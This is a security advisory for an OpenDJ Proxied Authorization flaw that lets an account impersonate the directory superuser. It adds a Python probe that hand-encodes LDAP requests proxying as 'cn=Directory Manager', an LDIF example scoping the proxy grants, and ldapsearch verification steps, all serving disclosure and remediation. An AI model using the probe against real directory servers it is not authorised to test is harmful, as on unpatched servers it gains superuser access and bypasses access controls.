A security vulnerability has been discovered in OpenDJ. This issue is present in all versions of OpenDJ including 2.6.x, 2.5.0-Xpress1, 2.4.x, and possibly previous versions.
This advisory provides guidance on how to secure your deployments. Workarounds or patches are available for the issue, and the fix will also be included in the forthcoming OpenDJ 2.6.3 maintenance release.
The severity of the issue in this advisory is High. Deployers should take immediate steps as outlined in this advisory and apply the relevant update at the earliest opportunity.
The recommendation is to deploy the relevant patch or to upgrade to OpenDJ 2.6.3 when it becomes available.
Customers without existing patches can obtain patches for OpenDJ 2.6.0 – 2.6.2 from BackStage. Customers with deployed patches should contact the support organization to obtain an updated patch. Customers running earlier releases need to upgrade. The fix is also present in the community “trunk” nightly builds.
Issue #201504-01: Proxied Authorization may allow unexpected escalation of privileges and access.
Affected versions: 2.4.0 – 2.4.6, 2.5.0-Xpress1, 2.6.0 – 2.6.2
Fixed versions: n/a (the fix ships in the forthcoming OpenDJ 2.6.3 release; patches are available for 2.6.0 – 2.6.2)
Component: Core Server
JIRA ID: OPENDJ-2071
Once an account has been granted the privilege to proxy requests and permission to use the Proxied Authorization control, OpenDJ does not restrict which authorization identities that account may assume. Such an account can therefore impersonate the directory superuser (“cn=Directory Manager”) and bypass all access controls.
The vulnerability is not exploitable by default: the authenticated user must first have been granted all of the following:
- The “proxied-auth” privilege
- The access control permission to use the Proxied Authorization control
- The access control permission to “proxy” as the authorization user
OpenDJ did not correctly enforce the third requirement, so any account holding the first two could proxy as any user, including “cn=Directory Manager”. This is now fixed.
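The following probe, an added example that is not part of this advisory or of OpenDJ, shows how a tester checks the third requirement directly: it hand-encodes an LDAP simple bind and a base-object search carrying the Proxied Authorization v2 control (RFC 4370, OID 2.16.840.1.113730.3.4.18) and classifies the server's result code. The host, port, DNs and password are hypothetical placeholders. A result code of 0 for an account that holds the proxied-auth privilege and the control permission, but has not been granted the proxy right on the target identity, is the missing enforcement this advisory describes; a patched server should refuse the request.

```python
"""Probe whether a bound LDAP account can proxy as a given authorization identity.

Constructed example, not part of the advisory or of OpenDJ: it hand-encodes an LDAP
simple bind and a base-object search carrying the Proxied Authorization v2 control
(RFC 4370, OID 2.16.840.1.113730.3.4.18) and reports the server's result code.
"""
import socket

PROXIED_AUTH_OID = "2.16.840.1.113730.3.4.18"

# --- minimal BER helpers (lengths above 127 use the long form) -------------------
def ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content

def ber_int(v):      # non-negative INTEGER; extra byte keeps the sign bit clear
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))

def ber_str(s):  return tlv(0x04, s.encode())
def ber_enum(v): return tlv(0x0A, bytes([v]))
def ber_bool(b): return tlv(0x01, b"\xff" if b else b"\x00")

def read_tlv(buf, pos=0):
    """Return (tag, content, next_pos) for the TLV starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

# --- LDAP messages -----------------------------------------------------------------
def bind_request(msg_id, dn, password):
    # BindRequest ::= [APPLICATION 0] { version 3, name, simple [0] password }
    body = ber_int(3) + ber_str(dn) + tlv(0x80, password.encode())
    return tlv(0x30, ber_int(msg_id) + tlv(0x60, body))

def proxied_auth_control(authz_id, critical=True):
    # RFC 4370: the controlValue is the bare authzId ("dn:..." or "u:..."), no extra wrapping
    return tlv(0x30, ber_str(PROXIED_AUTH_OID) + ber_bool(critical) + ber_str(authz_id))

def search_request(msg_id, base_dn, authz_id):
    # Base-object search, filter (objectClass=*), attribute list "1.1" (return no attributes)
    body = (ber_str(base_dn) + ber_enum(0) + ber_enum(0) + ber_int(1) + ber_int(0)
            + ber_bool(False) + tlv(0x87, b"objectClass") + tlv(0x30, ber_str("1.1")))
    controls = tlv(0xA0, proxied_auth_control(authz_id))   # [0] Controls
    return tlv(0x30, ber_int(msg_id) + tlv(0x63, body) + controls)

def parse_result(msg):
    """(msg_id, op_tag, resultCode, diagnosticMessage) of a message carrying an LDAPResult."""
    _, seq, _ = read_tlv(msg)
    _, mid, p = read_tlv(seq)
    op_tag, op, _ = read_tlv(seq, p)
    _, code, p = read_tlv(op)
    _, _matched_dn, p = read_tlv(op, p)
    _, diag, _ = read_tlv(op, p)
    return int.from_bytes(mid, "big"), op_tag, int.from_bytes(code, "big"), diag.decode(errors="replace")

def classify(result_code):
    """Interpret the SearchResultDone code of a proxied request."""
    return {
        0:   "proxy accepted: server searched as the proxied identity",
        123: "proxy denied: authorizationDenied (RFC 4370)",
        50:  "proxy denied: insufficientAccessRights",
        12:  "control refused: unavailableCriticalExtension",
    }.get(result_code, f"other result code {result_code}")

def recv_message(sock):
    """Read exactly one BER-framed LDAPMessage from the socket."""
    def recv_exact(n):
        out = b""
        while len(out) < n:
            chunk = sock.recv(n - len(out))
            if not chunk:
                raise ConnectionError("server closed the connection")
            out += chunk
        return out
    head = recv_exact(2)
    ln = head[1]
    if ln & 0x80:
        ext = recv_exact(ln & 0x7F)
        head, ln = head + ext, int.from_bytes(ext, "big")
    return head + recv_exact(ln)

def probe(host, port, bind_dn, password, authz_id, base_dn):
    """Bind as bind_dn, then search base_dn while proxying as authz_id; return the result code."""
    with socket.create_connection((host, port)) as s:
        s.sendall(bind_request(1, bind_dn, password))
        _, _, code, diag = parse_result(recv_message(s))
        if code != 0:
            raise RuntimeError(f"bind failed: {code} {diag}")
        s.sendall(search_request(2, base_dn, authz_id))
        while True:   # skip SearchResultEntry (0x64) messages until SearchResultDone (0x65)
            msg = recv_message(s)
            _, seq, _ = read_tlv(msg)
            _, _, p = read_tlv(seq)
            if read_tlv(seq, p)[0] == 0x65:
                return parse_result(msg)[2]

if __name__ == "__main__":
    # Hypothetical deployment values. On an unpatched server an application account that
    # holds only the proxied-auth privilege and the control permission gets result 0 here.
    code = probe("ldap.example.com", 1389, "uid=app,ou=services,dc=example,dc=com",
                 "secret", "dn:cn=Directory Manager", "dc=example,dc=com")
    print(code, classify(code))
```

Run the probe once with an ordinary user as the authorization identity (the application account should be allowed to proxy as that user) and once with “dn:cn=Directory Manager”; the second request must not return 0 on a patched server. The control is marked critical so that a server which does not honour it fails the request instead of silently answering as the bound user.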
There is no complete workaround. One way to limit exposure is to make sure that the proxied-auth privilege is granted only to administrative accounts used by well-known applications, for which the use of the Proxied Authorization control has been tested and verified. Until the patch is applied, any account holding that privilege together with permission to use the control must be treated as equivalent to the directory superuser.
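The configuration below is an added example, not part of this advisory or of OpenDJ, showing the three grants listed above for one hypothetical application account, uid=app,ou=services,dc=example,dc=com, with the proxy right scoped to ou=people only. The base DN, account name and subtree are assumptions.

```ldif
# Constructed LDIF for a hypothetical application account. Apply with ldapmodify as an administrator.

# 1. Privilege: only this account may proxy at all. Keep the list of such accounts minimal;
#    on unpatched servers this is the only grant that is actually enforced.
dn: uid=app,ou=services,dc=example,dc=com
changetype: modify
add: ds-privilege-name
ds-privilege-name: proxied-auth

# 2. Permission to use the Proxied Authorization v2 control (OID 2.16.840.1.113730.3.4.18).
# 3. The proxy right, limited to entries under ou=people. After patching, this ACI is the
#    boundary: the account can proxy only as entries it matches, never as cn=Directory Manager.
dn: dc=example,dc=com
changetype: modify
add: aci
aci: (targetcontrol="2.16.840.1.113730.3.4.18")(version 3.0; acl "app may use the proxied auth control"; allow(read) userdn="ldap:///uid=app,ou=services,dc=example,dc=com";)
aci: (target="ldap:///ou=people,dc=example,dc=com")(targetattr="*")(version 3.0; acl "app may proxy as ordinary users only"; allow(proxy) userdn="ldap:///uid=app,ou=services,dc=example,dc=com";)
```

To verify the boundary after patching, bind as the application account with the OpenDJ ldapsearch tool and pass the superuser as the proxied identity (the --proxyAs option, -Y, takes an authzId such as "dn:cn=Directory Manager"): the search must be rejected, while the same search proxied as a user under ou=people must succeed. On an affected server the first search succeeds as well, which is the escalation this advisory describes.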
Update/upgrade to a fixed version or deploy the relevant patch.